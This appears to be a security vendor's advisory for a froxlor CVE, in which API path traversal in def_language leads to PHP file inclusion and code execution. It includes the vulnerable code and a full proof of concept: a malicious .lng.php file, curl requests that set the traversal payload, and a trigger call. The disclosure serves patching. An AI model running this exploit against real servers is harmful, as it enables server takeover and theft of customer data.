Skip to main content

Boteraser | Website and Server Security Solutions

🛡️ CVE-2026-41228 — froxlor

🔴 CVSS 9.9 — Critical ⚠️ Exploit Public CWE-98 NVD
9.9
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

Froxlor has Local File Inclusion via path traversal in API def_language parameter leads to Remote Code Execution

Summary

The Froxlor API endpoint Customers.update (and Admins.update) does not validate the def_language parameter against the list of available language files. An authenticated customer can set def_language to a path traversal payload (e.g., ../../../../../var/customers/webs/customer1/evil), which is stored in the database. On subsequent requests, Language::loadLanguage() constructs a file path using this value and executes it via require, achieving arbitrary PHP code execution as the web server user.

Details

Root cause: The API and web UI have inconsistent validation for the def_language parameter.

The web UI (customer_index.php:261, admin_index.php:265) correctly validates def_language against Language::getLanguages(), which scans the lng/ directory for actual language files:

```php

// customer_index.php:260-265

$def_language = Validate::validate(Request::post('def_language'), 'default language');

if (isset($languages[$def_language])) {

Customers::getLocal($userinfo, [

'id' => $userinfo['customerid'],

'def_language' => $def_language

])->update();

```

The API (Customers.php:1207, Admins.php:600) only runs Validate::validate() with the default regex /^[^\r\n\t\f\0]*$/D, which permits path traversal sequences:

```php

// Customers.php:1167-1172 (customer branch)

} else {

// allowed parameters

$def_language = $this->getParam('def_language', true, $result['def_language']);

...

}

// Customers.php:1207 - validation (shared by admin and customer paths)

$def_language = Validate::validate($def_language, 'default language', '', '', [], true);

```

The tainted value is stored in the panel_customers (or panel_admins) table. On every subsequent request, it is loaded and used in two paths:

API path (ApiCommand.php:218-222):

```php

private function initLang()

{

Language::setLanguage(Settings::Get('panel.standardlanguage'));

if ($this->getUserDetail('language') !== null && isset(Language::getLanguages()[$this->getUserDetail('language')])) {

Language::setLanguage($this->getUserDetail('language'));

} elseif ($this->getUserDetail('def_language') !== null) {

Language::setLanguage($this->getUserDetail('def_language')); // No validation

}

}

```

Web path (init.php:180-185):

```php

if (CurrentUser::hasSession()) {

if (!empty(CurrentUser::getField('language')) && isset(Language::getLanguages()[CurrentUser::getField('language')])) {

Language::setLanguage(CurrentUser::getField('language'));

} else {

Language::setLanguage(CurrentUser::getField('def_language')); // No validation

}

}

```

The language session field is null for API requests and empty on fresh web logins, so both paths fall through to the unvalidated def_language.

File inclusion (Language.php:89-98):

```php

private static function loadLanguage($iso): array

{

$languageFile = dirname(__DIR__, 2) . sprintf('/lng/%s.lng.php', $iso);

if (!file_exists($languageFile)) {

return [];

}

$lng = require $languageFile; // Arbitrary PHP execution

```

With $iso = '../../../../../var/customers/webs/customer1/evil', the path resolves to /var/customers/webs/customer1/evil.lng.php, escaping the lng/ directory.

PoC

Step 1 — Upload malicious language file via FTP:

Froxlor customers have FTP access to their web directory by default (api_allowed defaults to 1 in the schema).

```bash

# Create malicious .lng.php file

echo '<?php system("id > /tmp/pwned"); return [];' > evil.lng.php

# Upload to customer web directory via FTP

ftp panel.example.com

> put evil.lng.php

```

The file is now at /var/customers/webs/<loginname>/evil.lng.php.

Step 2 — Set traversal payload via API:

```bash

curl -s -X POST https://panel.example.com/api \

-H 'Authorization: Basic <base64(apikey:apisecret)>' \

-d '{"command":"Customers.update","params":{"def_language":"../../../../../var/customers/webs/customer1/evil"}}'

```

The traversal path is stored in the database. The .lng.php suffix is appended automatically by Language::loadLanguage().

Step 3 — Trigger inclusion on next API call:

```bash

curl -s -X POST https://panel.example.com/api \

-H 'Authorization: Basic <base64(apikey:apisecret)>' \

-d '{"command":"Customers.get"}'

```

ApiCommand::initLang() loads def_language from the database and passes it to Language::setLanguage()loadLanguage()require /var/customers/webs/customer1/evil.lng.php.

Step 4 — Verify execution:

```bash

cat /tmp/pwned

# Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)

```

Impact

An authenticated customer can execute arbitrary PHP code as the web server user. This enables:

  • Full server compromise: Read lib/userdata.inc.php to obtain database credentials, then access all customer dat

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs low-level privileges on the target. No user interaction is required. The scope is changed, meaning a successful attack can affect components beyond the vulnerable one. Rated impact: confidentiality high, integrity high, availability high.

CVSS metrics in full

The score comes from this vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

  • Attack vector: Network — reachable from anywhere that can route to the service.
  • Attack complexity: Low — the attack works reliably, with no preparation.
  • Privileges required: Low — an ordinary user account is enough.
  • User interaction: None — nobody has to be tricked into anything.
  • Scope: Changed — a successful attack reaches components beyond the vulnerable one.
  • Confidentiality impact: High — total loss, or loss the attacker controls.
  • Integrity impact: High — total loss, or loss the attacker controls.
  • Availability impact: High — total loss, or loss the attacker controls.

Weakness class

CVE-2026-41228 is classified as CWE-98: PHP Remote File Inclusion. A PHP include path is taken from user input, so a remote or attacker-controlled file can be loaded and executed.

Affected software

CVE-2026-41228 is recorded against 2 packages.

  • froxlor (fixed in 2.3.6)
  • froxlor/froxlor (fixed in 2.3.6)

Timeline and source

Published on 23 April 2026 and last revised on 17 June 2026. A public exploit is known to exist, which raises the urgency of patching considerably. A vendor advisory or fix has been published. Record sourced from NVD.

References

github.com
github.com
github.com
github.com

Other advisories for this package

froxlor has other advisories on record. If you are patching this one, these are worth checking on the same host:

Same weakness in other software

These advisories are the same class of weakness (CWE-98: PHP Remote File Inclusion) in other software:

Details

Severity CRITICAL
CVSS Score 9.9
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE CWE-98
Public Exploit ⚠️ Yes
Source NVD
Published 2026-04-23
Updated 2026-08-20
Modified 2026-06-17

Affected Packages

Software From version Fixed in
froxlor 2.3.6
froxlor/froxlor 2.3.6

Similar Threats

Exploit Protection

Are you running froxlor?

CVE-2026-41228 carries CVSS 9.9 Critical rating and a public exploit already exists. BotEraser checks your installation against this and other known CVE records, and blocks IPs associated with exploit activity.

Check My Site For CVE-2026-41228 →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.

Browse related advisories

All advisoriesCVECVE 2026